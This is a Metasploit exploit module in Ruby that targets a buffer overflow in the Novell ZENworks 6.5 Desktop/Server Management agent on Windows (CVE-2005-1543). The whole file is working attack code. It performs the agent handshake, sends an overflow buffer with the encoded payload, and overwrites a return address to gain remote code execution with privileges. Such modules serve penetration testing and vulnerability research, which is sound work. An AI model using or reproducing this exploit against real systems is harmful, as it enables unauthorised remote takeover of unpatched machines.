## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow', 'Description' => %q{ This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler. }, 'Author' => [ 'Unknown' ], 'License' => BSD_LICENSE, 'References' => [ [ 'CVE', '2005-1543'], [ 'OSVDB', '16698'], [ 'BID', '13678'], ], 'Privileged' => true, 'Payload' => { 'Space' => 32767, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => %w{ win }, 'Targets' => [ [ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', { 'Platform' => 'win', 'Ret' => 0x10002e06, }, ], ], 'DisclosureDate' => 'May 19 2005', 'DefaultTarget' => 0)) end def exploit connect hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77" print_status("Sending version identification") sock.put(hello) pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars) ident = sock.get_once if !(ident and ident.length == 16) print_error("Failed to receive agent version identification") return end print_status("Received agent version identification") print_status("Sending client acknowledgement") sock.put("\x00\x01") # Stack buffer overflow in ZenRem32.exe / ZENworks Server Management sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01") ack = sock.get_once sock.put("\x00\x01") sock.put("\x00\x02") print_status("Sending final payload") sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V')) print_status("Overflow request sent, sleeping for four seconds") select(nil,nil,nil,4) handler disconnect end end